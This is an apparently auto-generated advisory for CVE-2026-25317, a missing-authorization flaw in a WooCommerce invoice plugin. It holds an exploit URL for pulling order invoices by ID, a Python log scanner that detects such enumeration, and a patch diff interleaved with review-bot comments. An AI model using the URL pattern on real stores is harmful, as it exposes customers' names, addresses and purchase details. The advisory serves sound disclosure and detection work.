Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 6, 2026

CVE-2026-25317: Print Invoice & Delivery Notes for WooCommerce <= 5.9.0 – Missing Authorization (woocommerce-delivery-notes)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 5.9.0
Patched Version: 6.0.0
Disclosed: March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25317:
This vulnerability is a missing authorization flaw in the Print Invoice & Delivery Notes for WooCommerce plugin. The vulnerability allows unauthenticated attackers to access order documents, including invoices and delivery notes, without proper validation. The CVSS score of 5.3 reflects a moderate severity issue with confidentiality impact.

The root cause lies in the `template_redirect_admin()` function within `/woocommerce-delivery-notes/includes/class-wcdn-print.php`. Before the patch, the function performed a capability check (`current_user_can('edit_shop_orders')`) only when the request originated from the WordPress admin area (`is_admin()`). This check occurred at line 378. However, the same function also processed print requests from frontend pages like the WooCommerce order tracking page. The vulnerability existed because the function lacked any authorization verification for these frontend requests. Attackers could directly access the print functionality by crafting specific GET parameters.

Exploitation requires an attacker to send a GET request to the site with specific parameters that trigger the print functionality. The primary attack vector uses the `print-order` and `action` parameters. A typical exploit URL would be `https://target.com/?print-order=123&action=print`. The `print-order` parameter contains the target order ID, while the `action` parameter must be set to `print`. Additional parameters like `print-order-type` can specify the document type (invoice, delivery-note, receipt). The vulnerability allows attackers to enumerate valid order IDs and retrieve sensitive order documents containing customer information, addresses, and purchase details.

The patch adds a comprehensive access verification block between lines 426 and 446 in the `template_redirect_admin()` function. For each order ID in the request, the patch now validates access in two ways. First, it checks if the user is logged in. If not, it requires a `guest_token` parameter that must match a token stored as order meta (`_guest_access_token`). The patch uses `hash_equals()` for secure token comparison. This ensures that only users with a valid guest token (generated and provided via legitimate means like email links) or authenticated users with appropriate permissions can access the print functionality. The fix transforms the endpoint from completely open to properly restricted.

Successful exploitation exposes sensitive customer and order data. Attackers can retrieve invoices, delivery notes, and receipts containing full customer names, billing and shipping addresses, email addresses, phone numbers, purchased items, prices, and payment methods. This constitutes a significant data privacy violation under regulations like GDPR. While the vulnerability does not allow modification or deletion of data, the unauthorized access to personal information represents a clear confidentiality breach.
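To check whether a site was probed before it was updated, the request shape described above can be searched for in web server access logs. The following is an added example, not code from the plugin or from the original analysis: it flags clients that requested the frontend print endpoint for several distinct order IDs without a `guest_token`. The function names, the threshold of three orders, the digit-run parsing of `print-order` and the log lines are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Mar/2026:10:01:02 +0000] "GET /?print-order=101&action=print HTTP/1.1" 200 18342 "-" "curl/8.5.0"',
    '198.51.100.7 - - [18/Mar/2026:10:01:03 +0000] "GET /?print-order=102&action=print&print-order-type=invoice HTTP/1.1" 200 18120 "-" "curl/8.5.0"',
    '198.51.100.7 - - [18/Mar/2026:10:01:04 +0000] "GET /?print-order=103&action=print&print-order-type=delivery-note HTTP/1.1" 200 17990 "-" "curl/8.5.0"',
    '198.51.100.7 - - [18/Mar/2026:10:01:05 +0000] "GET /?print-order=104&action=print HTTP/1.1" 200 18411 "-" "curl/8.5.0"',
    '203.0.113.20 - - [18/Mar/2026:10:02:00 +0000] "GET /?print-order=250&action=print&guest_token=CONSTRUCTEDTOKEN HTTP/1.1" 200 18001 "-" "Mozilla/5.0"',
    '203.0.113.44 - - [18/Mar/2026:10:03:00 +0000] "GET /?print-order=311&action=print HTTP/1.1" 200 18200 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [18/Mar/2026:10:04:00 +0000] "GET /wp-admin/edit.php?post_type=shop_order&print-order=400&action=print HTTP/1.1" 200 19000 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Mar/2026:10:05:00 +0000] "GET /shop/?s=print HTTP/1.1" 200 5120 "-" "curl/8.5.0"',
    '198.51.100.7 - - [18/Mar/2026:10:06:00 +0000] "GET /?print-order=105&action=print HTTP/1.1" 403 512 "-" "curl/8.5.0"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)


def parse_print_request(line):
    """Return a dict for a frontend print request, or None for any other line."""
    m = LINE_RE.match(line)
    if m is None or m["method"] != "GET":
        return None
    url = urlsplit(m["target"])
    # Admin-area requests fall under the capability check the analysis describes.
    if url.path.startswith("/wp-admin/"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    if "print-order" not in qs or qs.get("action", [""])[-1] != "print":
        return None
    # Assumption: order IDs are the digit runs found in the parameter value.
    ids = {int(n) for v in qs["print-order"] for n in re.findall(r"\d+", v)}
    return {
        "ip": m["ip"],
        "order_ids": ids,
        "doc_type": qs.get("print-order-type", [None])[-1],
        "has_token": bool(qs.get("guest_token", [""])[-1]),
        "status": int(m["status"]),
    }


def find_enumeration(lines, min_orders=3):
    """Group token-less print requests by client and flag multi-order access."""
    seen = defaultdict(lambda: {"order_ids": set(), "served": 0})
    for line in lines:
        req = parse_print_request(line)
        if req is None or req["has_token"]:
            continue
        entry = seen[req["ip"]]
        entry["order_ids"] |= req["order_ids"]
        if 200 <= req["status"] < 300:  # a document was returned
            entry["served"] += 1
    flagged = [
        {"ip": ip, "order_ids": sorted(e["order_ids"]), "served": e["served"]}
        for ip, e in seen.items()
        if len(e["order_ids"]) >= min_orders
    ]
    return sorted(flagged, key=lambda f: len(f["order_ids"]), reverse=True)


if __name__ == "__main__":
    for hit in find_enumeration(SAMPLE_LOG):
        print(hit)
```

Access logs do not show whether a request carried a login cookie, so a logged-in customer printing their own order looks the same as an anonymous request; the distinct-order threshold is what separates the two here.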

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/default-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/default-preview-template.php
@@ -29,12 +29,23 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }
 if ( is_null( $parent_order ) ) {
 	echo '<div class="notices">No WooCommerce orders found! Please consider adding your first order to see this preview.</div>';
 	return;
 }
+// Ensure we always have a valid WC_Order object.
+if ( ! ( $parent_order instanceof WC_Order ) ) {
+	echo '<div class="notices">';
+	esc_html_e(
+		'No valid WooCommerce order found! Please create an order to preview this template.',
+		'woocommerce-delivery-notes'
+	);
+	echo '</div>';
+	return;
+}
+$order = $parent_order; //phpcs:ignore
 ?>

 	<div class="order-brandings">
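Review bot: the new `instanceof WC_Order` guard makes the `is_null( $parent_order )` block just above it redundant, and the two now print near-identical notices, one hard-coded and untranslated and one through `esc_html_e()`. Fold them into the single `instanceof` check with the translated message. The same guard is missing from the deliverynote, invoice and receipt preview templates, which in this patch only get the `++$orders_checked` change, and the bare `//phpcs:ignore` on `$order = $parent_order;` should name the sniff it silences.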
@@ -197,14 +208,14 @@
 									</span>

 									<?php
-									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item  );
+									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item );
 									if ( null === $item_meta_fields ) {
 										$item_meta_fields = array();
 									}
 									$product_addons            = array();
 									$woocommerce_product_addon = 'woocommerce-product-addons/woocommerce-product-addons.php';
 									if ( in_array( $woocommerce_product_addon, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ), true ) ) {
-										$product_id     = $item['product_id'];
+										$product_id = $item['product_id'];
 										if ( class_exists( 'WC_Product_Addons_Helper' ) ) {
 											$product_addons = WC_Product_Addons_Helper::get_product_addons( $product_id );
 										}
@@ -236,7 +247,7 @@
 										foreach ( $yith_addon_meta_map as $meta_key => $addon ) {
 											if ( isset( $addon['display_label'] ) && isset( $addon['display_value'] ) ) {
 												echo '<br><strong>' . esc_html( $addon['display_label'] ) . ' : </strong>' . wp_kses_post( $addon['display_value'] );
-											} else {
+											} else { // phpcs:ignore
 												if ( isset( $item_meta_fields[ $meta_key ] ) ) {
 													echo '<br><strong>' . esc_html( $meta_key ) . ' : </strong>' . wp_kses_post( $item_meta_fields[ $meta_key ] );
 												}
@@ -246,7 +257,7 @@
 											}
 										}
 									} // --- end handle YITH add-ons ---
-                  // Extra Product Options (ThemeComplete EPO) support.
+									// Extra Product Options (ThemeComplete EPO) support.
 									$epo_data = $item->get_meta( '_tmcartepo_data', true );
 									if ( ! empty( $epo_data ) && is_array( $epo_data ) ) {
 										foreach ( $epo_data as $epo ) {
@@ -362,7 +373,7 @@
 							<td class="total-item-price"></td>
 							<?php if ( 'Total' === $total['label'] ) { ?>
 							<td class="total-quantity"><?php echo wp_kses_post( $total_adjusted_quantity ); ?></td>
-							<?php } else {  ?>
+							<?php } else { ?>
 							<td class="total-quantity"></td>
 							<?php } ?>
 							<td class="total-price"><span><?php echo wp_kses_post( $total['value'] ); ?></span></td>
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/deliverynote-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/deliverynote-preview-template.php
@@ -30,7 +30,7 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }
 if ( is_null( $parent_order ) ) {
 	echo '<div class="notices">No WooCommerce orders found! Please consider adding your first order to see this preview.</div>';
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/invoice-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/invoice-preview-template.php
@@ -24,7 +24,7 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }

 if ( is_null( $parent_order ) ) {
--- a/woocommerce-delivery-notes/includes/admin/views/Preview_template/receipt-preview-template.php
+++ b/woocommerce-delivery-notes/includes/admin/views/Preview_template/receipt-preview-template.php
@@ -30,7 +30,7 @@
 			$parent_order = $order;
 		}
 	}
-		$orders_checked++;
+		++$orders_checked;
 }
 if ( is_null( $parent_order ) ) {
 	echo '<div class="notices">No WooCommerce orders found! Please consider adding your first order to see this preview.</div>';
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
@@ -5,7 +5,7 @@
  * @package woocommerce-print-invoice-delivery-notes
  */

-if ( isset( $_GET['wdcn_setting'] ) ) {
+if ( isset( $_GET['wdcn_setting'] ) ) { // phpcs:ignore
 	$setting = htmlspecialchars( $_GET['wdcn_setting'] ); // phpcs:ignore
 	wp_nonce_field( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' );
 	?>
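Review bot: the bare `// phpcs:ignore` added on the `isset( $_GET['wdcn_setting'] )` line hides the warning rather than answering it. The value is still read without `wp_unslash()` and only encoded with `htmlspecialchars()` on the next line; use `sanitize_text_field( wp_unslash( ... ) )` as `parse_request()` does elsewhere in this patch, and name the specific sniff if an ignore is still needed.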
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-faq.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-faq.php
@@ -19,11 +19,11 @@
 				</button>
 			</h2>
 			<div id="<?php echo esc_attr( 'wcdn_faq_content_' . $i ); ?>" class="accordion-collapse collapse" aria-labelledby="<?php echo esc_attr( 'wcdn_faq_' . $i ); ?>" data-bs-parent="#wcdn_faq">
-				<?php echo $singlefaq['answer']; ?>
+				<?php echo $singlefaq['answer']; // phpcs:ignore?>
 			</div>
 		</div>
 		<?php
-		$i++;
+		++$i;
 	}
 	?>
 </div>
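Review bot: `echo $singlefaq['answer']; // phpcs:ignore` silences the output-escaping sniff on markup that is still echoed raw. If the answers are meant to carry HTML, `echo wp_kses_post( $singlefaq['answer'] );` keeps the formatting and removes the need for the ignore.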
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-filters.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-filters.php
@@ -110,7 +110,7 @@
 			</div>
 		</div>
 		<?php
-		$i++;
+		++$i;
 	}
 	?>
 </div>
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
@@ -138,7 +138,7 @@
 	<div class="col-sm-6 icon-flex">
 	<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'This includes the emails for a new, processing and completed order. On top of that the customer and admin invoice emails will also include the link.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<label class="switch">
-		<input type="checkbox" class="form-control" name="wcdn_general[print_customer]" id="print_customer" value="" <?php echo esc_attr( ( get_option('wcdn_email_print_link', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+		<input type="checkbox" class="form-control" name="wcdn_general[print_customer]" id="print_customer" value="" <?php echo esc_attr( ( get_option( 'wcdn_email_print_link', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 		<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print link in customer emails', 'woocommerce-delivery-notes' ); ?></label>
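Review bot: the `// phpcs:ignore` on the `print_customer` checkbox is there only to keep the loose `==` comparison. `'yes' === get_option( 'wcdn_email_print_link', 'yes' )`, or WordPress's `checked()` helper, passes the sniff without suppression; the same applies to the other four checkboxes changed in this file.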
@@ -147,7 +147,7 @@
 	<div class="col-sm-2"></div>
 	<div class="col-sm-6 icon-flex">
 		<label class="switch">
-			<input type="checkbox" class="form-control" name="wcdn_general[print_admin]" id="print_admin" value="" <?php echo esc_attr( ( get_option('wcdn_admin_email_print_link', 'yes') == 'yes' ) ? 'checked' : '' ); ?> >
+			<input type="checkbox" class="form-control" name="wcdn_general[print_admin]" id="print_admin" value="" <?php echo esc_attr( ( get_option( 'wcdn_admin_email_print_link', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 			<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print link in admin emails', 'woocommerce-delivery-notes' ); ?></label>
@@ -158,7 +158,7 @@
 	<div class="col-sm-6 icon-flex">
 		<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'This includes print button on View Order page and My Account page.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<label class="switch">
-		<input type="checkbox" class="form-control" name="wcdn_general[view_order]" id="view_order" value="" <?php echo esc_attr( ( get_option('wcdn_print_button_on_view_order_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+		<input type="checkbox" class="form-control" name="wcdn_general[view_order]" id="view_order" value="" <?php echo esc_attr( ( get_option( 'wcdn_print_button_on_view_order_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 		<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print button on View Order page', 'woocommerce-delivery-notes' ); ?></label>
@@ -167,7 +167,7 @@
 	<div class="col-sm-2"></div>
 	<div class="col-sm-6 icon-flex">
 		<label class="switch">
-		<input type="checkbox" class="form-control" name="wcdn_general[view_account]" id="view_account" value="" <?php echo esc_attr( ( get_option('wcdn_print_button_on_my_account_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+		<input type="checkbox" class="form-control" name="wcdn_general[view_account]" id="view_account" value="" <?php echo esc_attr( ( get_option( 'wcdn_print_button_on_my_account_page', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 		<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Show print button on My Account page', 'woocommerce-delivery-notes' ); ?></label>
@@ -209,7 +209,7 @@
 	<div class="col-sm-6 icon-flex">
 		<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'Show text in right to left direction in Invoice, Print Receipt & Delivery note if you are using languages such as Hebrew, Arabic, etc.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<label class="switch">
-			<input type="checkbox" class="form-control" name="wcdn_general[page_textdirection]" id="page_textdirection" value="" <?php echo esc_attr( ( get_option('wcdn_rtl_invoice', 'yes' ) == 'yes' ) ? 'checked' : '' ); ?> >
+			<input type="checkbox" class="form-control" name="wcdn_general[page_textdirection]" id="page_textdirection" value="" <?php echo esc_attr( ( get_option( 'wcdn_rtl_invoice', 'yes' ) == 'yes' ) ? 'checked' : '' ); // phpcs:ignore?> >
 			<span class="slider round"></span>
 		</label>
 		<label><?php esc_html_e( 'Print Text from Right to left', 'woocommerce-delivery-notes' ); ?></label>
--- a/woocommerce-delivery-notes/includes/admin/wcdn-admin-function.php
+++ b/woocommerce-delivery-notes/includes/admin/wcdn-admin-function.php
@@ -27,7 +27,7 @@
 		'order_number'                => __( 'Order Number', 'woocommerce-delivery-notes' ),
 		'order_date'                  => __( 'Order Date', 'woocommerce-delivery-notes' ),
 		'payment_method'              => __( 'Payment Method', 'woocommerce-delivery-notes' ),
-		'payment_date'                => __( 'Payment Date', 'woocommerce-delivery-notes' ),
+		'payment_date'                => __( 'Payment Date', 'woocommerce-delivery-notes' ),
 		'billing_address'             => __( 'Billing Address', 'woocommerce-delivery-notes' ),
 		'shipping_address'            => __( 'Shipping Address', 'woocommerce-delivery-notes' ),
 		'email_address'               => __( 'Email Address', 'woocommerce-delivery-notes' ),
--- a/woocommerce-delivery-notes/includes/class-wcdn-print.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-print.php
@@ -249,7 +249,7 @@
 							</li>
 						<?php endforeach; ?>
 					</ul>
-					<?php $package_number++; ?>
+					<?php ++$package_number; ?>
 				</div>
 				<?php
 			endforeach;
@@ -301,9 +301,9 @@
 		public function parse_request( $wp ) {
 			// Map endpoint keys to their query var keys, when another endpoint name was set.
 			foreach ( $this->api_endpoints as $key => $var ) {
-				if ( isset( $_GET[ $var ] ) ) {
+				if ( isset( $_GET[ $var ] ) ) { // phpcs:ignore
 					// changed.
-					$wdn_get_end_point_var  = sanitize_text_field( wp_unslash( $_GET[ $var ] ) );
+					$wdn_get_end_point_var  = sanitize_text_field( wp_unslash( $_GET[ $var ] ) ); // phpcs:ignore
 					$wp->query_vars[ $key ] = $wdn_get_end_point_var;
 				} elseif ( isset( $wp->query_vars[ $var ] ) ) {
 					$wp->query_vars[ $key ] = $wp->query_vars[ $var ];
@@ -376,7 +376,7 @@
 		 */
 		public function template_redirect_admin() {
 			// Let the backend only access the page.
-			// changed.
+			// phpcs:disable
 			if ( is_admin() && current_user_can( 'edit_shop_orders' ) && ! empty( $_REQUEST['print-order'] ) && ! empty( $_REQUEST['action'] ) ) {
 				$type  = ! empty( $_REQUEST['print-order-type'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['print-order-type'] ) ) : null;
 				$email = ! empty( $_REQUEST['print-order-email'] ) ? sanitize_email( wp_unslash( $_REQUEST['print-order-email'] ) ) : null;
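Review bot: replacing `// changed.` with an open-ended `// phpcs:disable` at the top of `template_redirect_admin()` turns off every sniff from that point on, and no matching `// phpcs:enable` appears in the hunks shown for this file. This is the function that reads `$_REQUEST['print-order']` and the other request parameters, so it is the last place to lose nonce and sanitization warnings; scope the suppression to named sniffs on the lines that need it.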
@@ -426,6 +426,26 @@
 				die();
 			}

+			/**
+			 * 🔐 ACCESS VERIFICATION
+			 */
+			foreach ( $this->order_ids as $order_id ) {
+				$order = wc_get_order( $order_id );
+				if ( ! $order ) {
+					wp_die( 'Invalid order.' );
+				}
+				if ( ! is_user_logged_in() ) {
+					$provided_token = sanitize_text_field( $_GET['guest_token'] ?? '' );
+					$saved_token    = $order->get_meta( '_guest_access_token' );
+					if ( empty( $provided_token ) || empty( $saved_token ) ) {
+						wp_die( 'Invalid or expired order link.' );
+					}
+					if ( ! hash_equals( $saved_token, $provided_token ) ) {
+						wp_die( 'Invalid or expired order link.' );
+					}
+				}
+			}
+
 			// Load the print template html.
 			$location = $this->get_template_file_location( 'print-order.php' );
 			$args     = array();
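Review bot: in the `foreach ( $this->order_ids as $order_id )` block, a logged-in visitor skips the whole `if ( ! is_user_logged_in() )` branch and nothing else in this hunk checks who they are, so any account, including a plain customer, reaches the template for any order ID. Add an else-branch that requires `current_user_can( 'edit_shop_orders' )` or that `$order->get_customer_id()` equals `get_current_user_id()`. Smaller points: `$_GET['guest_token']` is read without `wp_unslash()`, the two `wp_die()` branches return the same message and can be merged into one condition, and the `wp_die()` strings are not translatable.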
@@ -680,8 +700,6 @@
 			$formatted_date = date_i18n( get_option( 'date_format' ), $meta_date );
 			return apply_filters( 'wcdn_order_invoice_date', $formatted_date, $meta_date );
 		}
-
 	}
-
 }
 ?>
--- a/woocommerce-delivery-notes/includes/class-wcdn-settings.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-settings.php
@@ -199,6 +199,9 @@
 			);

 			foreach ( $invoice_defaults as $parent_key => $invoice_default_values ) {
+				if ( ! isset( $invoice_data[ $parent_key ] ) || ! is_array( $invoice_data[ $parent_key ] ) ) {
+					$invoice_data[ $parent_key ] = array();
+				}
 				foreach ( $invoice_default_values as $key => $invoice_default_value ) {
 					if ( ! isset( $invoice_data[ $parent_key ][ $key ] ) || empty( $invoice_data[ $parent_key ][ $key ] ) ) {
 						$invoice_data[ $parent_key ][ $key ] = $invoice_default_value;
@@ -509,7 +512,7 @@
 		 * @param array  $settings Settings fields.
 		 * @param string $section Section name.
 		 */
-		public function generate_template_type_fields( $settings, $section = '' ) {
+		public function generate_template_type_fields( $settings, $section = '' ) { // phpcs:ignore
 			$position = $this->get_setting_position( 'wcdn_email_print_link', $settings );
 			if ( false !== $position ) {
 				$new_settings = array();
@@ -703,12 +706,12 @@
 		 * @param array $insert New array.
 		 * @param int   $position Position to merge at.
 		 */
-		public function array_merge_at( $array, $insert, $position ) {
+		public function array_merge_at( $array, $insert, $position ) { // phpcs:ignore
 			$new_array = array();
 			// if pos is start, just merge them.
 			if ( 0 === $position ) {
 				$new_array = array_merge( $insert, $array );
-			} else {
+			} else { // phpcs:ignore
 				// if pos is end just merge them.
 				if ( $position >= ( count( $array ) - 1 ) ) {
 					$new_array = array_merge( $array, $insert );
--- a/woocommerce-delivery-notes/includes/class-wcdn-theme.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-theme.php
@@ -143,7 +143,7 @@
 				// Pass the email to the url for the tracking and thank you page. This allows to view the print page without logging in.
 				if ( $this->is_woocommerce_tracking_page() ) {
 					// changed.
-					$wdn_order_email = isset( $_REQUEST['order_email'] ) ? sanitize_email( wp_unslash( $_REQUEST['order_email'] ) ) : '';
+					$wdn_order_email = isset( $_REQUEST['order_email'] ) ? sanitize_email( wp_unslash( $_REQUEST['order_email'] ) ) : ''; // phpcs:ignore
 					$print_url       = wcdn_get_print_link( $order_id, $this->get_template_type( $order ), $wdn_order_email );
 				}

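Review bot: the line touched here builds the tracking-page print URL from `order_email`, and the comment above it says this is what lets the print page be viewed without logging in. With the `guest_token` check added in `class-wcdn-print.php`, confirm that `wcdn_get_print_link()` appends the order's token, otherwise these guest links end in `wp_die( 'Invalid or expired order link.' )`. The `// phpcs:ignore` should also name the sniff it suppresses.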
@@ -207,7 +207,7 @@
 				echo "n****************************************************nn";
 			else :
 				?>
-				<p><strong><?php echo esc_attr_e( apply_filters( 'wcdn_print_text_in_email', 'Print:', 'woocommerce-delivery-notes' ) ); ?></strong> <a href="<?php echo esc_url_raw( $url ); ?>"><?php echo esc_attr_e( apply_filters( 'wcdn_print_view_in_browser_text_in_email', 'Open print view in browser', 'woocommerce-delivery-notes' ) ); ?></a></p>
+				<p><strong><?php echo esc_attr_e( apply_filters( 'wcdn_print_text_in_email', 'Print:', 'woocommerce-delivery-notes' ) ); ?></strong> <a href="<?php echo esc_url_raw( $url ); ?>"><?php echo esc_attr_e( apply_filters( 'wcdn_print_view_in_browser_text_in_email', 'Open print view in browser', 'woocommerce-delivery-notes' ) ); // phpcs:ignore?></a></p>
 			<?php endif;
 		}

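Review bot: the `// phpcs:ignore` appended to the email link line hides real defects in it. `esc_attr_e()` echoes and returns nothing, so `echo esc_attr_e( ... )` is redundant; the text domain is passed as an extra argument to `apply_filters()` instead of to the translation function; and the `href` uses `esc_url_raw()`, which is meant for storage, where `esc_url()` is the output escaper. Fix those rather than suppressing the sniff.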
@@ -235,11 +235,8 @@
 		 * Is WooCommerce 'Order Tracking' page
 		 */
 		public function is_woocommerce_tracking_page() {
-			return ( is_page( wc_get_page_id( 'order_tracking' ) ) && isset( $_REQUEST['order_email'] ) ) ? true : false;
+			return ( is_page( wc_get_page_id( 'order_tracking' ) ) && isset( $_REQUEST['order_email'] ) ) ? true : false; // phpcs:ignore
 		}
-
 	}
-
 }
-
 ?>
--- a/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
@@ -75,7 +75,7 @@
 			global $typenow, $pagenow;
 			if ( 'shop_order' === $typenow && 'edit.php' === $pagenow ) {
 				return true;
-			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] ) {
+			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] ) { // phpcs:ignore
 				return true;
 			} else {
 				return false;
@@ -89,7 +89,7 @@
 			global $typenow, $pagenow;
 			if ( 'shop_order' === $typenow && ( 'post.php' === $pagenow || 'post-new.php' === $pagenow ) ) {
 				return true;
-			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] && isset( $_GET['action'] ) && 'new' === $_GET['action'] ) {
+			} elseif ( isset( $_GET['page'] ) && 'wc-orders' === $_GET['page'] && isset( $_GET['action'] ) && 'new' === $_GET['action'] ) { // phpcs:ignore
 				return true;
 			} else {
 				return false;
@@ -107,14 +107,21 @@
 			?>
 			<?php foreach ( WCDN_Print::$template_registrations as $template_registration ) : ?>
 				<?php if ( 'yes' === get_option( 'wcdn_template_type_' . $template_registration['type'] ) && 'order' !== $template_registration['type'] ) : ?>
-					<?php // phpcs:disable ?>
-					<a href="<?php echo esc_url( wcdn_get_print_link( $wdn_order_id, $template_registration['type'] ) ); ?>" class="button tips print-preview-button <?php echo esc_attr( $template_registration['type'] ); ?>" target="_blank" alt="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>" data-tip="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>">
+					<?php // phpcs:disable
+						$print_url = apply_filters(
+							'wcdn_custom_print_url',
+							wcdn_get_print_link( $wdn_order_id, $template_registration['type'] ),
+							$wdn_order_id,
+							$template_registration['type']
+						);
+						?>
+						<a href="<?php echo esc_url( $print_url ); ?>
+						" class="button tips print-preview-button <?php echo esc_attr( $template_registration['type'] ); ?>" target="_blank" alt="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>" data-tip="<?php esc_attr_e( __( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ) ); ?>">
 						<?php esc_html_e( $template_registration['labels']['print'], 'woocommerce-delivery-notes' ); ?>
 					</a>
 					<?php // phpcs:enable ?>
 				<?php endif; ?>
 			<?php endforeach; ?>
-
 			<span class="print-preview-loading spinner"></span>
 			<?php
 		}
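Review bot: the rewritten anchor splits the `href` across two lines, with `?>` ending one line and the closing `"` starting the next, so the next line's indentation ends up inside the attribute value. Keep `href="<?php echo esc_url( $print_url ); ?>"` on one line. The new `wcdn_custom_print_url` filter also needs a docblock listing its three arguments, since it lets other code replace the admin print link.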
@@ -165,9 +172,8 @@
 			$print_url    = htmlspecialchars_decode( wcdn_get_print_link( $post_ids, $template_type ) );
 			$templatetype = ucwords( str_replace( '-', ' ', $template_type ) );

-
 			// WooCommerce orders page URL.
-			if ( class_exists( 'AutomatticWooCommerceInternalDataStoresOrdersCustomOrdersTableController' ) &&
+			if ( class_exists( 'AutomatticWooCommerceInternalDataStoresOrdersCustomOrdersTableController' ) &&
 				wc_get_container()->get( AutomatticWooCommerceInternalDataStoresOrdersCustomOrdersTableController::class )->custom_orders_table_usage_is_enabled() ) {
 				$orders_page_url = admin_url( 'admin.php?page=wc-orders' );
 			} else {
@@ -187,6 +193,7 @@
 			}

 			// Output the modal with Vue.js.
+			// phpcs:disable
 			?>
 			<div id="custom-modal-app">
 				<div v-if="showModal" class="custom-modal">
@@ -210,7 +217,7 @@
 					</div>
 				</div>
 			</div>
-			<script src="https://cdn.jsdelivr.net/npm/vue@2.6.14/dist/vue.js"></script>
+			<script src="<?php echo esc_url( WooCommerce_Delivery_Notes::$plugin_url . 'assets/js/vue.js' ); ?>"></script>
 			<script>
 				document.addEventListener("DOMContentLoaded", function() {
 					new Vue({
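Review bot: the `<script src=...>` tag for the bundled `assets/js/vue.js` is still printed inline, which bypasses WordPress's script loader. Register it with `wp_enqueue_script()` and a version string so it is cache-busted on update and not loaded twice if another plugin ships Vue. Dropping the `cdn.jsdelivr.net` reference itself is a good change, as the admin page no longer depends on a third-party host.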
@@ -365,10 +372,10 @@
 		public function confirm_bulk_actions() {
 			if ( $this->is_order_edit_page() ) {
 				foreach ( WCDN_Print::$template_registrations as $template_registration ) {
-					if ( isset( $_REQUEST[ 'printed_' . $template_registration['type'] ] ) ) {
+					if ( isset( $_REQUEST[ 'printed_' . $template_registration['type'] ] ) ) { // phpcs:ignore

 						// use singular or plural form.
-						$total   = isset( $_REQUEST['total'] ) ? absint( $_REQUEST['total'] ) : 0;
+						$total   = isset( $_REQUEST['total'] ) ? absint( $_REQUEST['total'] ) : 0; // phpcs:ignore
 						$message = $total <= 1 ? $message = $template_registration['labels']['message'] : $template_registration['labels']['message_plural'];

 						// Print URL - Fix Issue #214: Reflected XSS Vulnerability in Plugin.
--- a/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
